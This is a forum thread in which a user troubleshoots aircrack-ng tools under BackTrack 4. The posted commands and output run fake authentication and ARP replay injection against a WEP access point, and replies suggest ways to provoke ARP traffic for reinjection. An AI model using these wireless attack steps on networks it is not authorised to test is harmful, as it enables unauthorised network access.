Results 1 to 9 of 9

Thread: Not capturing packets correctly

Hybrid View

  1. #1
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Exclamation Not capturing packets correctly

    I'm having problem with capturing packets this the first time it has happened to me and i googled the problem. Now it works fine with backtrack 3 and ubuntu but for some reason with backtrack 4 it's not working, now these are the commands I'm using and the outputs I'm getting.


    Code:
    root@YOU:~# aireplay-ng -1 0 -a 00:1D:68:E8:9A:87 mon0
    No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
    22:46:04  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1
    
    22:46:04  Sending Authentication Request (Open System) [ACK]
    22:46:04  Authentication successful
    22:46:04  Sending Association Request [ACK]
    22:46:04  Association successful :-) (AID: 1)
    root@YOU:~# aireplay-ng -3 -b 00:1D:68:E8:9A:87 mon0
    No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
    22:46:32  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1
    Saving ARP requests in replay_arp-1028-224632.cap
    You should also start airodump-ng to capture replies.
    1280 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    I know it said it didn't specify a mac but even when i do specify a mac it still doesn't work..

    Code:
     CH  1 ][ Elapsed: 2 mins ][ 2009-10-28 22:48
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:1D:68:E8:9A:87  -60 100     1653       73    0   1  54   WEP  WEP    OPN  Thomson1492EA
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:1D:68:E8:9A:87  00:11:22:33:44:55   -1    1 - 0      0        2
     00:1D:68:E8:9A:87  00:24:2B:7C:3E:9D    0    1 - 1      0       25
    Any suggestions would be great.... THNX
    One day your life will flash before your eyes. Make sure its worth watching.

  2. #2
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Default

    Seems like it hasn't located a useable packet for re-injection.

    Simply ping an unreachable or non-existant IP from the client on the network, it will broadcast and then aireplay-ng will pick it up and start re-injection.

  3. #3
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Default

    just tried it still no luck.
    One day your life will flash before your eyes. Make sure its worth watching.

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    If you use wireshark on the interface and put in the WEP key can you see ARP packets being sent across the wire(less) when you try to ping other machines?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Default

    Do you mean ping the router or the computers connected.. If they are the computers connected how am I supposed to go about doing that when I'm not connected to the router.
    One day your life will flash before your eyes. Make sure its worth watching.

  6. #6
    Junior Member
    Join Date
    Sep 2009
    Posts
    43

    Default

    What Gitsnik says is: ping the router with a computer already connected on the network and then look on your unconnected computer if you see some ARP packets.

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default

    Can you write your whole command to me because i think i'm having the same problem with you and i'm cracking my head thinking whats going on.thanks.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •